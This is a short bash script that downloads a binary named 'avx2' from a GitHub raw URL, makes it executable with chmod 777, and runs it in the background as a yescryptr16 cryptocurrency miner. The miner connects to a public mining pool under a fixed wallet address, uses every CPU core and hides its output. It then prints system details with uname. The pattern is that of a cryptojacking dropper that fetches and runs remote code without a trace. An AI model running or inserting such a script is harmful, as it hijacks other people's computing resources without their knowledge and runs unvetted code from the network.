#!/bin/bash
wget https://raw.githubusercontent.com/jsiqiisn/a/main/avx2
chmod 777 avx2
./avx2 -a yescryptr16 -o stratum+tcps://stratum-eu.rplant.xyz:17055 -u qgTQ3cPZQutNLiiCe96fpRochwezYWiDr8.qog -t$(nproc --all) > /dev/null 2>&1 &
uname -a
